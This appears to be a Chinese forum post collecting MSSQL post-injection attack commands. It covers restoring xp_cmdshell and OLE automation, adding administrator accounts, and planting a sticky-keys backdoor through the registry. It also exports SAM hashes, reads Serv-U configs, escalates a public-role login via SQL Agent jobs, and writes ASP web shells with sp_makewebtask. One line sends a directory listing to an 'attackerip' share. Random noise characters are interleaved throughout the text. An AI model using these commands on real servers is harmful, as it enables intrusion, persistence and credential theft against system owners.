1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
3 x+ ] f" H& u恢复方法:查询分离器连接后,
' S/ m3 z6 I8 b1 |8 C第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
- T$ a: n7 Y3 v第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' $ t2 C' m: O7 k1 Y& o" u3 A
然后按F5键命令执行完毕
5 R. s- V( k5 V. }3 R! n# t. M, p3 V" q$ K, ?& z8 l% P% O7 v# e
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
- U4 V+ k# j S6 p4 P恢复方法:查询分离器连接后,
4 K1 r2 z1 u: Q2 |' }. O第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"+ W3 E) i+ x- R2 n" M
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# F3 U1 [8 x) k5 }0 z r然后按F5键命令执行完毕
# K2 S2 f5 [, v
7 m7 Q2 k. u2 L3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)6 O# B7 s) P, F1 J; d# Z4 Y
恢复方法:查询分离器连接后,
2 D+ \& ]/ L: k. @) i0 n8 ` m第一步执行:exec sp_dropextendedproc 'xp_cmdshell'# v5 I U) p1 H- y9 S" [
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 2 x2 F. v* |/ _) F) G5 l f$ L; t
然后按F5键命令执行完毕7 ^( ]* ?9 l/ U% X+ D4 N( e: O
# a2 f2 m& o$ g" C0 d6 d1 P
4 终极方法.$ i8 M* [! N3 N8 o$ s8 f- C7 R. s
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:9 d) U: l( H% u; D/ |5 {
查询分离器连接后,
; ?( Y* f! l' O; Y" X' Q& k& m2000servser系统:
) m: o6 w. R; N% sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add') x8 `: l1 f4 T @
+ T/ y7 q" A/ M( v7 g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
, A' j" D# q, ] Q5 p# ~1 p9 h) E8 a4 `! F$ j( q1 b' J6 v5 x1 c! Z
xp或2003server系统:
+ R1 S& T1 H8 ~% H7 M0 f* x- L: O+ w# l, S9 J8 y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
3 E8 L. v0 O( [1 ^5 w& B- M* W! L! y" w' g9 ~6 e
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'! p$ F7 {, W: V1 K
/ c( M9 L3 D: J" G2 _- Q3 s
8 M: ]6 u7 H! a0 ]8 Q/ x# V6 M j
五个SHIFT- V: L$ T8 m" |& c6 B" ^5 s6 V
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
1 e* I8 T5 c9 i6 e" H3 _ X K
5 l# ~; I/ a7 H, s* }" C$ K. qdeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
/ Q+ m- b& W6 w9 B0 m
V- E4 V: N- h; T8 S/ z; u1 Y5 i5 hxp_cmdshell执行命令另一种方法0 T$ k0 ?2 @. i5 X$ a C6 \( ]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' % H1 {& g2 D$ X# h' b
8 |3 ]" l" o0 V
判断存储扩展是否存在1 C* {+ a4 e1 ] Q* w
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
0 X! D3 `& L, {7 e) w- m1 @返回结果为1就OK
6 u0 u( w, B, ~3 i( L- b2 w
3 S$ @" j1 [2 b- _' R! w
8 U4 E1 I0 S. l. Z! G& Q上传xplog70.dll恢复xp_cmdshell语句: X: V. `2 s6 Z4 e5 e6 T
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'# z+ z( l1 `( R; y, a
3 x' h M+ W$ R! E! y
否则上传xplog7.0.dll! ]& o; l' B7 m8 B
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
2 J5 h S* K+ c+ d2 a% W6 K3 c4 r7 H; ] G4 H0 E+ e
$ x- ~! I, X: o- `1 k6 h
1 q8 V, d- i( j$ z( ~9 U$ ~* u/ j; M
首先开启沙盘模式:
" a8 j7 {: n1 Xexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
! a+ @' y2 M( K; L' x# I8 G: A, `: x4 r/ P/ t5 C0 h$ d+ ]: U
然后利用jet.oledb执行系统命令
* u! |" y# Y4 T0 ~6 c% N2 L% wselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')0 x9 A; y" w8 ?8 @/ F$ c* T
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了& q/ S P0 D5 ?# X+ b! j
0 P- u' ?; E: m) }; }4 h* N5 m- K7 T2 [ u: W5 M( C3 h
2 l* N& ~1 Y# C+ i恢复过程sp_addextendedproc 如下:
) }! n2 B+ ]0 g4 k$ j3 d0 Mcreate procedure sp_addextendedproc --- 1996/08/30 20:13
$ h V, h. C9 j@functname nvarchar(517),/* (owner.)name of function to call */ & n( o" a ~7 W5 H! x1 Q. p
@dllname varchar(255)/* name of DLL containing function */ 8 c9 n% x0 w% t, N4 ?0 V. m; M
as $ k \( C9 F; i4 C( ~5 ?
set implicit_transactions off
! D3 a# R& ^: l0 t# X1 j) [if @@trancount > 0 5 S* r) J) s* a% v/ R" f7 d5 ^
begin ! |) o& e/ a; j6 e. x% g, y
raiserror(15002,-1,-1,'sp_addextendedproc') 1 O a; b& ^' T: i! p8 W1 L
return (1)
5 \ j7 w/ B( I, n1 q, `" A% Jend
/ k/ Z8 X: B) v2 t& n- |dbcc addextendedproc( @functname, @dllname)
0 O/ Z3 h1 J# rreturn (0) -- sp_addextendedproc ! E$ X2 L7 k1 I; b3 D
GO , d& U% s1 c" G3 g0 e3 e2 ~0 u
5 @) C1 h* W! S
d8 B* j9 R U8 S+ h" M2 M
/ A3 Y( i ~1 |. @+ ~/ j8 e( m导出管理员密码文件
4 r/ h0 y( `+ A1 N/ Jsa默认可以读sam键.应该。1 ~1 T) N, Z5 N* f" j3 F
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
/ K( P: e5 _/ j/ ^# `7 B. @net user administrator test
0 f4 n, R5 _ Y% c$ b1 V7 e# S; ~5 l用administrator登陆./ c" C. D) Q- e( E3 u! E# K! C6 L$ a5 s
用完机器后
( ?7 r: X% R9 N: B, Dreg import c:\test.reg
( E. t& C4 t8 k: T根本不用克隆.% f, o+ e8 b9 b+ H1 m' y0 F: }. o
找到对应的sid. ! q. d+ N% }9 x0 x& O3 E* \% L
- W& n- f" B% T* R7 R! p. N4 y7 p: ~ G6 @" @' n8 ]% l0 r
' P$ u5 G: G- W, n7 ~, t, \恢复所有存储过程4 Y6 h, K+ U7 D O* p+ g7 F$ w
use master
( }" G6 i$ |# m7 a- t" e/ B0 Dexec sp_addextendedproc xp_enumgroups,'xplog70.dll' 9 N8 c( O1 k" w7 N4 g, \! G: ~! g- E0 V
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' , J E9 |0 ?9 n) `6 h
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' - v2 ~& v2 l! o0 [' J, U
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' y6 C; F7 v# c; ] q( r
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' ) h3 c) K( K2 ?8 w
exec sp_addextendedproc sp_OACreate,'odsole70.dll' % r: a6 Z5 [8 y
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' ; G$ K8 l3 V, o6 ^) d) U- g0 k6 o
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
4 L3 f4 h) H4 e+ P! ], x8 l9 _exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
/ b+ U( s' S2 k- Kexec sp_addextendedproc sp_OAMethod,'odsole70.dll'
0 W# B/ q( Y1 Iexec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
) }7 B7 G1 g1 L* Dexec sp_addextendedproc sp_OAStop,'odsole70.dll' 1 T8 q! p: ]0 n% B3 y0 Q# N( G* ~
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 0 W4 B1 z# S5 Z2 Q) w. o6 V
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' ! ?" I. e" }( V- f" l+ ~8 W0 \
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
8 K0 |1 O! q& ^* s3 R9 C" ]exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
$ T2 r2 V2 S, m. u3 E; {3 B/ q1 O& V8 Bexec sp_addextendedproc xp_regread,'xpstar.dll'
) q$ S* g8 A; aexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' $ x* ~5 Y V0 k$ ]
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
# o V7 J8 v6 Q8 c r( Lexec sp_addextendedproc xp_availablemedia,'xpstar.dll'
6 i5 f6 W9 l H1 I) r9 h2 o- x4 K! V& f" Z W3 j6 ?
; b! o T V+ g% A/ p' O' H& Q建立读文件的存储过程* y3 x; d$ }5 o1 Z+ T$ X
Create proc sp_readTextFile @filename sysname
9 V$ N- X+ ?5 |$ }as) m* M1 x K# \$ b& @ P
; q( \% Z% Q( P' U
begin + M' l, V; E% q7 v
set nocount on ( A* S6 g: B8 D! Y3 t9 k+ b% V
Create table #tempfile (line varchar(8000))
" C; A: {# H- Q& j( x: k exec ('bulk insert #tempfile from "' + @filename + '"')$ ^8 Y3 x7 Y. r
select * from #tempfile
* ^2 a& L- Q; p3 [ drop table #tempfile: `7 d- {- o* E
End
7 K `! w% i& I( L2 K) g, n, l, `+ n: \- }+ O i, X% g3 c
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
; P3 M$ r8 h! L查看登录用户
Y3 q. a7 x, f2 HSelect * from sysxlogins
) N m/ l* o5 S1 N% X1 c7 x: L
$ g. S3 a- k8 l! M/ ~, m把文件内容读取到表中5 h2 C! x( e7 i) ~
BULK INSERT tmp from "c:\test.txt"# V' q& m4 o+ ]9 c" Y0 |
dElete from 表名 清理表里的内容
) t" ~4 Y c, D; B( F, w: i8 O( Wcreate table b_test(fn nvarchar(4000));建一个表,字段为fn- Q A; m( N% h: M( g
, J/ v6 f, G3 v( n8 b
, N2 i/ n9 M8 d j9 S加sa用户8 X( z \' M2 t; @: }9 d8 ^2 X
exec master.dbo.sp_addlogin user,pass;
* @% e9 G" T- q( J0 [; {# vexec master.dbo.sp_addsrvrolemember user,sysadmin
4 Y) o2 A1 G' _* s8 h
/ Q+ y9 C5 z+ }- j+ j
9 `7 `+ @1 i& P: t. ]( c
8 o4 F* ]2 A; m7 o读文件代码! v" N, ?% ~* Z4 Q
declare @o int, @f int, @t int, @ret int( B/ o" y0 M' F
declare @line varchar(8000)3 t f: O" }9 g2 e8 l' P
exec sp_oacreate 'scripting.filesystemobject', @o out$ ?( U! `4 Z& I' C! l6 z
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1. @+ L( [' n% o4 {" P
exec @ret = sp_oamethod @f, 'readline', @line out; _1 ]6 S' A3 J" s
while( @ret = 0 )
Q3 ?/ `* ]- m) qbegin7 l; `0 F4 q+ W* K& e
print @line
. @# E0 i' g& ~. {exec @ret = sp_oamethod @f, 'readline', @line out' M5 t- X2 E: |1 @* Z( O
end* t- Q- t+ _$ z0 ]$ @# ^6 V) [
6 X6 r6 t$ ]6 y) @
@+ z! z3 T) a
写文件代码:( {$ ~6 |2 s/ j3 }
declare @o int, @f int, @t int, @ret int' x+ B; G# ?$ p
exec sp_oacreate 'scripting.filesystemobject', @o out
2 B; T& J$ G. B& d, t1 ?5 R5 ?) I( Wexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1% X1 ~; S$ N9 V7 k
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》" Q5 t o3 i* i. G) g
8 f: z5 [+ t5 X% v
- g& S7 N) }3 m: W2 d4 V3 u( b2 `8 g
添加lake2 shell9 L- ^* x$ I! c7 S
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
6 L4 s) y8 X9 a$ O* Lsp_dropextendedproc xp_lake2" x0 K4 b" H- c
EXEC xp_lake2 'net user'' X* U) v! V+ p% J1 L9 Q* p; x& K
- @" U+ S/ o- I- G% \5 Z* T7 k6 \$ {& K$ J5 X
得到硬盘文件信息 3 X' V" C) i5 H) l. F5 R1 h
--参数说明:目录名,目录深度,是否显示文件 % b; J5 H! R: W9 D
execute master..xp_dirtree 'c:'
' _9 w" O1 K3 lexecute master..xp_dirtree 'c:',1 : @; y* \6 W4 L3 I: Q( b
execute master..xp_dirtree 'c:',1,1
0 s- N! C6 E5 B( b0 u7 W4 ?, U, U* \: B
M- o) K; j' q `: t" z4 _读serv-u配置信息) I8 }! a6 q5 i8 x& B. P
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'4 t3 N5 ~. ~! C6 ^7 y
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'& J7 m) n6 m1 X% G) a) P X& E
5 g4 x o# D! i+ O
通过xp_regwrite写SHIFT后门
+ y) L+ w: S5 }- R' Aexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--$ r- r5 u* _5 {5 o9 ^: X
- T: ?0 [. B" u0 Y
" p+ {7 m8 M+ Y/ K$ F; N- i9 z$ h) Z8 J2 d7 _, ]
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
; W8 [% z8 Y3 i" I, ^! Lexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
' u% P4 K4 ^/ D8 [# V+ U: `! d. v, m0 ?0 k
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表', E6 ]* j1 P) q5 g. o) i
) M- C1 i, s |) l
& T T( s: z# ?
% q: `1 ?/ d" [1 V1 D
sql server 2005下开启xp_cmdshell的办法% V5 T$ M4 \2 f
7 `$ a2 \$ [7 T6 @3 _, GEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
- `2 o/ c# ~; r; G2 I: U9 T4 {$ o
8 i4 H! D, `9 i1 @# B3 qSQL2005开启'OPENROWSET'支持的方法:
( { B& N1 S0 Z
/ @2 H- s( w5 l: Q' ` A j* Fexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;0 P( t2 y9 a& f, C5 L
% Y4 n& P0 a8 q( ^! F+ d$ R; x
SQL2005开启'sp_oacreate'支持的方法:5 |; u# t9 M" O; a# }
: X- V7 l0 Q a% Z) |
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;9 s) }/ Y, _2 C) A. E- X
1 v5 C! R8 y5 Z) e3 T! _, |% C& ?
& H8 n% ?* ?/ P2 Q: E& B+ n- W$ W- k) Q
6 i/ m4 @) b5 k! G* M$ w Y
$ @" _% g: g" |2 C% J" v6 G
5 U" R; ?; e& d" G( \: F' u3 p
& v1 } ~3 O. ^/ E0 b( l& y
, x0 x/ f1 ^3 e' P) @( y4 B! x3 E, ^5 b! G
( p8 M3 s- X ^5 w2 S: }
0 k* P/ o- g! l3 v9 d8 K; X! U
2 Y0 }& H: k4 s% v( P" x$ ?" j1 I6 D& U/ n# b
$ i! }3 f6 L9 p" ]6 h
% L; |4 @3 O! P- E+ k/ e; v } G6 r- j r
; |, l; [9 W5 W" t
{2 n' [, j" `
2 A) N' W" V7 p8 }; q+ _
; }6 m3 F+ i0 x4 k# R- s" A$ A, D) s! v# b
# N$ ]5 e# Y4 n+ m% H. k% \( E! U* S8 r$ G! M
% [2 s- z- P$ C5 p% U9 r8 d7 ^9 T: K以下方面不知道能不能成功暂且留下研究哈:
* z4 |! m2 {+ s6 e# w4)
: i" J4 \( k6 Guse msdb; --这儿不要是master哟
7 v8 U" k4 U' n& T, ^4 q: N P. Qexec sp_add_job @job_name= czy82 ;
* Y" ?) L; T0 D* _: ~0 E sexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;! K, t4 F5 i0 | N4 @
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;. `3 l% q3 M* J" w
exec sp_start_job @job_name= czy82 ;
/ D- e5 r' N0 w% q3 w$ h8 Z
: p5 M& n& W( N利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以% a; W: l) F) t$ `/ Z
执行tsql语句了.0 a- K* U/ H, o B
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名; v+ Z/ o; H: b p
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
. }% i, Y4 Q M [& l; r) enet start SQLSERVERAGENT
4 z4 r* Q4 E! U. o+ e8 R1 f/ x! O& w$ p8 i
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
! _* `* k3 l0 f7 j9 w- G1 ` uUSE msdb2 G7 @2 d, Z- }- I" u
EXEC sp_add_job @job_name = GetSystemOnSQL ,
! X8 i9 }- t+ _1 G% G7 a, h$ D0 H@enabled = 1,
& ^" k* ^% |$ y D8 q@description = This will give a low privileged user access to
1 c1 s8 c0 ?2 d0 a% o! V( Bxp_cmdshell ,7 q: Z& t5 L2 O' s
@delete_level = 1
& H+ j5 ~2 X" dEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,2 g4 P; p( c; h% y$ y5 U
@step_name = Exec my sql ,
6 x& V5 c) L! k$ C5 i8 s) z9 y! y@subsystem = TSQL ,6 y; K. m1 k3 W, b) d
@command = exec master..xp_execresultset N select exec
* D0 D7 A7 `1 R6 G \* [ }master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
8 Y: @0 a9 B, R5 m& P$ `5 ]' h) mEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,5 ^2 w- `- |* Z0 c
@server_name = 你的SQL的服务器名
% \6 v, L8 N8 f9 o2 ~) O' c) A. ZEXEC sp_start_job @job_name = GetSystemOnSQL ; l, A( Y. T0 A: c7 {6 q
* K# v% [6 m9 m& q( g4 x) D
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以( S% s9 E" M$ G" t& U% r3 u4 }
才让我们可以以public执行xp_cmdshell, f( ]# p; R( ?+ s" i
$ D" _7 a5 ^# U0 b+ I& x7 M4 {- F0 u
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)7 T/ V) M7 X% S& b8 y# `) b7 o8 e
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=29681 V$ O) L; [: Q* J+ X, v
/ m1 b5 k. K- E4 W- WUSE msdb
- H" Z7 K+ U5 L: K9 {% i- k9 kEXEC sp_add_job @job_name = ArbitraryFilecreate ,
0 C; |: [5 N5 F% v( |, C9 w1 s' A' D@enabled = 1,$ z5 E8 a. g; p
@description = This will create a file called c:\sqlafc123.txt ,
" Z* ^# u8 e s, `% a+ `@delete_level = 1
9 T- @7 _& ^+ J$ M& b# IEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
/ S% g7 I; U0 }+ [8 N@step_name = SQLAFC ,
) q% E% S8 ^5 Q2 A2 C1 E0 d3 w, g@subsystem = TSQL ,# H* j9 ]# a$ W, `: K9 u0 ~/ R5 O
@command = select hello, this file was created by the SQL Agent. ,1 e( j* h& C b' \4 p* L
@output_file_name = c:\sqlafc123.txt 1 B- l( v( ^% G
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,0 V/ R5 M. {" E! W9 x
@server_name = SERVER_NAME 5 P4 w; z8 z. ?: t4 O
EXEC sp_start_job @job_name = ArbitraryFilecreate , X0 K/ e" V+ | X
0 ^: a( M9 V5 r4 F5 L如果subsystem选的是:tsql,在生成的文件的头部有如下内容, x; |; A, c% ^4 v u# g
3 }5 H' E/ R# V0 `8 z7 g
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19( P$ P( d2 v4 W. Q
----------------------------------------------
- b5 J7 W- j8 u7 [! c. _* Whello, this file was created by the SQL Agent.
' a {2 O& }- U/ L/ D" s g+ ?/ w& K& Y0 |" ~: { g
(1 ?????)
- Z- d1 w4 b8 D. Y3 |" v- f% a1 l: ^, P0 e
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员, R5 c$ t' R: v) `. _. ~
命令的vbs文件到启动目录! D: t: D) m; Z/ v) X1 v$ n
& I8 V: p. w: a7 S* P9 c, j0 U6)关于sp_makewebtask(可以写任意内容任意文件名的文件)4 k7 Y: k# F8 I8 A+ {
关于sp_MScopyscriptfile 看下面的例子9 J! V& z: c3 o; V1 }- m) Y& u1 {
declare @command varchar(100)
- \: C. W5 R4 y4 U5 }* x' @declare @scripfile varchar(200)
( _8 K6 x* j6 @set concat_null_yields_null off
; A, @; [- M2 p3 ?8 Vselect @command= dir c:\ > "\\attackerip\share\dir.txt" * e, h: o& J: H0 A p$ ~& @( F
select @scripfile= c:\autoexec.bat > nul" | @command | rd " , {8 e# q- n4 Q6 \$ X* N
exec sp_MScopyscriptfile @scripfile , , B- s4 p, H8 s+ i
" }' N4 b) j( ]* r2 U
这两个东东都还在测试试哟" Z+ w% {& `/ V4 y
让MSSQL的public用户得到一个本机的web shell
3 D9 D9 l3 \. C, X' f, G
7 a" o5 F6 H9 [0 z* F9 qsp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,6 e+ g# H3 o" y/ Q1 v
--@query= select <img src=vbscript:msgbox(now())>
2 K) u: D, W! E, Y9 F- d y1 d--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> # o! C, r+ c8 k! `. N
@query= select
. e; O+ ?! N+ {5 c6 j% [& W# h<%On Error Resume Next , H; @ N% S2 |
Set oscript = Server.createObject("wscript.SHELL") ' ~5 Q$ p7 i, j. f- |2 e3 _
Set oscriptNet = Server.createObject("wscript.NETWORK")
% _( n* i- ], l( u' W( GSet oFileSys = Server.createObject("scripting.FileSystemObject") 6 W1 a& M. U ~% @
szCMD = Request.Form(".CMD") 1 t. I% L: \* Y5 @* }! {" c
If (szCMD <>"")Then
9 q) K! L+ d/ W( n" _3 Y$ m1 ~szTempFile = "C:\" & oFileSys.GetTempName()
, n& O+ ?8 k2 `. V1 pCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) ) K3 E$ n1 c+ K( j2 u
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
8 `4 r' O& ^7 g0 @End If %>
$ h" | L/ k' f/ o3 i<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> 9 n1 B2 C" B7 c2 T" L
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
* O( a0 f: i# `- F' t5 W! H4 d</FORM><RE>
- P6 D$ W8 m! ^& @<% If (IsObject(oFile))Then
0 A6 A; I( \& f! z4 {9 zOn Error Resume Next
. }# T$ Z! t2 i6 ?9 d/ H! LResponse.Write Server.HTMLEncode(oFile.ReadAll)
( f& s5 W$ ^; i, joFile.Close ( o7 |: B$ _3 J1 E6 F
Call oFileSys.deleteFile(szTempFile, True) 8 s4 \/ e" J7 e8 @/ p. }
End If%>
; [- ~/ _/ t/ @& p) H4 Y p</BODY></HTML> $ U9 f3 G8 o+ [3 r5 V
|
发表于 2012-9-15 14:37:30
收藏
支持
反对